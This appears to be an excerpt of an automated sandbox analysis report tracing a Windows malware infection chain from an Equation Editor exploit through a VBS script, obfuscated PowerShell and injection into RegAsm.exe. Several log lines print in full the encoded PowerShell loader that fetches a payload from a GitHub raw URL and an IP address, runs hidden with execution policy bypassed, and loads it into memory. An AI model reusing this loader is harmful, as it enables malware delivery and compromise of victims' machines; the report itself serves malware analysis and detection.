                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040F7E2 Sleep,ExitProcess,16_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,16_2_0041A7D9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 473Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1411Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1378Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3871Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9260Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1658Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3840Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 1378 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 3871 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -4200000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1692Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2052Thread sleep count: 193 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2052Thread sleep time: -96500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1972Thread sleep count: 271 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1972Thread sleep time: -813000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1972Thread sleep count: 9260 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1972Thread sleep time: -27780000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,16_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,16_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,16_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407877 FindFirstFileW,FindNextFileW,16_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044E8F9 FindFirstFileExA,16_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,16_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,16_2_00407CD2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_16-49084
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00443355 mov eax, dword ptr fs:[00000030h]16_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004120B2 GetProcessHeap,HeapFree,16_2_004120B2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00434BD8 SetUnhandledExceptionFilter,16_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0043BB71

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe16_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00419662 mouse_event,16_2_00419662
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjfnirwxmswrbmv0rjfniruxsawrbmtndkyd4jykgkcgnzzzxdxjsid0gzicrj3e0jysnahqnkyd0jysncccrj3m6ly8nkydyyscrj3cuzycrj2l0ahvidxnlcmnvbnrlbicrj3quy28nkydtlycrj05vrgv0zwn0t24nkycvtm9ezscrj3qnkydljysny3qnkydpjysnbi9yzscrj2zzl2gnkydljysnywrzl20nkydhaw4nkycvrgv0ywgnkydob3rolvynkycujysndhh0zne0oybnnldijysnyscrj3nlnicrjzrdb250zscrj250iccrjz0gjysnke5ldy1pjysnymply3qgjysnu3knkydzdgvtlk5ldc4nkydxzwjdbglljysnbicrj3qplicrj0rvdycrj24nkydsbycrj2fku3ryjysnaw5nkgc2v3vyjysnbck7igcnkyc2jysnv2inkydpjysnbmfyescrj0nvbnqnkydlbnqgpsbbu3knkydzdgvtlicrj0nvbnzlcicrj3rdoicrjzpgcm8nkydtqicrj2fzzscrjzy0u3ryjysnaw5njysnkgcnkyc2jysnv2jhjysnc2u2nccrj0nvbnrlbicrj3qpoycrjybnnldhc3nlbwjsjysnesa9iftszwynkydszscrj2n0aw9ulkfzcycrj2unkydtymx5xto6tg9hzccrjyhnnlcnkydiaw5hcnldbycrj250zw50jysnktsgjysnw2rujysnbglilklplicrj0hvbwunkyddjysnojpwqukocicrj2f5dhgnkyd0licrj1jfrvdslycrjza1nscrjy84nccrjzeumjmujysnoccrjzyxlicrjzqwjysnmscrjy8vonb0dghyyxksiccrj3jhescrj2rlc2f0axynkydhjysnzccrj29yjysnyxknkycsiccrj3jhewrlcycrj2f0jysnaxzhzg9yjysnyxksihjhewrljysncycrj2enkyd0axzhzccrj29yyxksiccrj3inkydhevinkydlz0fzbxjhescrjywgcmenkyd5cmenkyd5lhjhexjhesknks5yrvbmqunlkchby0hbcl0xmtqrw2niqxjdotcrw2niqxjdmtixksxbc1ryau5hxvtjsefyxtm0ks5yrvbmqunlkchby0hbcl0xmdirw2niqxjdmtezk1tjsefyxtuyksxbc1ryau5hxvtjsefyxtm5ks5yrvbmqunlkchby0hbcl0xmdmrw2niqxjdntqrw2niqxjdodcplftzvhjptkddw2niqxjdmzypick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x') (('g6wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'nodetecton'+'/node'+'t'+'e'+'ct'+'o'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/detah'+'noth-v'+'.'+'txtfq4; g6wb'+'a'+'se6'+'4conte'+'nt '+'= '+'(new-o'+'bject '+'sy'+'stem.net.'+'webclie'+'n'+'t).'+'dow'+'n'+'lo'+'adstr'+'ing(g6wur'+'l); g'+'6'+'wb'+'i'+'nary'+'cont'+'ent = [sy'+'stem.'+'conver'+'t]:'+':fro'+'mb'+'ase'+'64str'+'ing'+'(g'+'6'+'wba'+'se64'+'conten'+'t);'+' g6wassembl'+'y = [ref'+'le'+'ction.ass'+'e'+'mbly]::load'+'(g6w'+'binaryco'+'ntent'+'); '+'[dn'+'lib.io.'+'home'+']'+'::vai(r'+'aytx'+'t.'+'reewr/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayr'+'egasmray'+', ra'+'yra'+'y,rayray)').replace(([char]114+[char]97+[char]121),[string][char]34).replace(([char]102+[char]113+[char]52),[string][char]39).replace(([char]103+[char]54+[char]87),[string][char]36) )"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjfnirwxmswrbmv0rjfniruxsawrbmtndkyd4jykgkcgnzzzxdxjsid0gzicrj3e0jysnahqnkyd0jysncccrj3m6ly8nkydyyscrj3cuzycrj2l0ahvidxnlcmnvbnrlbicrj3quy28nkydtlycrj05vrgv0zwn0t24nkycvtm9ezscrj3qnkydljysny3qnkydpjysnbi9yzscrj2zzl2gnkydljysnywrzl20nkydhaw4nkycvrgv0ywgnkydob3rolvynkycujysndhh0zne0oybnnldijysnyscrj3nlnicrjzrdb250zscrj250iccrjz0gjysnke5ldy1pjysnymply3qgjysnu3knkydzdgvtlk5ldc4nkydxzwjdbglljysnbicrj3qplicrj0rvdycrj24nkydsbycrj2fku3ryjysnaw5nkgc2v3vyjysnbck7igcnkyc2jysnv2inkydpjysnbmfyescrj0nvbnqnkydlbnqgpsbbu3knkydzdgvtlicrj0nvbnzlcicrj3rdoicrjzpgcm8nkydtqicrj2fzzscrjzy0u3ryjysnaw5njysnkgcnkyc2jysnv2jhjysnc2u2nccrj0nvbnrlbicrj3qpoycrjybnnldhc3nlbwjsjysnesa9iftszwynkydszscrj2n0aw9ulkfzcycrj2unkydtymx5xto6tg9hzccrjyhnnlcnkydiaw5hcnldbycrj250zw50jysnktsgjysnw2rujysnbglilklplicrj0hvbwunkyddjysnojpwqukocicrj2f5dhgnkyd0licrj1jfrvdslycrjza1nscrjy84nccrjzeumjmujysnoccrjzyxlicrjzqwjysnmscrjy8vonb0dghyyxksiccrj3jhescrj2rlc2f0axynkydhjysnzccrj29yjysnyxknkycsiccrj3jhewrlcycrj2f0jysnaxzhzg9yjysnyxksihjhewrljysncycrj2enkyd0axzhzccrj29yyxksiccrj3inkydhevinkydlz0fzbxjhescrjywgcmenkyd5cmenkyd5lhjhexjhesknks5yrvbmqunlkchby0hbcl0xmtqrw2niqxjdotcrw2niqxjdmtixksxbc1ryau5hxvtjsefyxtm0ks5yrvbmqunlkchby0hbcl0xmdirw2niqxjdmtezk1tjsefyxtuyksxbc1ryau5hxvtjsefyxtm5ks5yrvbmqunlkchby0hbcl0xmdmrw2niqxjdntqrw2niqxjdodcplftzvhjptkddw2niqxjdmzypick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x') (('g6wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'nodetecton'+'/node'+'t'+'e'+'ct'+'o'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/detah'+'noth-v'+'.'+'txtfq4; g6wb'+'a'+'se6'+'4conte'+'nt '+'= '+'(new-o'+'bject '+'sy'+'stem.net.'+'webclie'+'n'+'t).'+'dow'+'n'+'lo'+'adstr'+'ing(g6wur'+'l); g'+'6'+'wb'+'i'+'nary'+'cont'+'ent = [sy'+'stem.'+'conver'+'t]:'+':fro'+'mb'+'ase'+'64str'+'ing'+'(g'+'6'+'wba'+'se64'+'conten'+'t);'+' g6wassembl'+'y = [ref'+'le'+'ction.ass'+'e'+'mbly]::load'+'(g6w'+'binaryco'+'ntent'+'); '+'[dn'+'lib.io.'+'home'+']'+'::vai(r'+'aytx'+'t.'+'reewr/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayr'+'egasmray'+', ra'+'yra'+'y,rayray)').replace(([char]114+[char]97+[char]121),[string][char]34).replace(([char]102+[char]113+[char]52),[string][char]39).replace(([char]103+[char]54+[char]87),[string][char]36) )"Jump to behavior
                    Source: RegAsm.exe, 00000010.00000002.1027592173.00000000008AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: RegAsm.exe, 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome
                    Source: RegAsm.exe, 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmp, logs.dat.16.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00434CB6 cpuid 16_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,16_2_0045201B
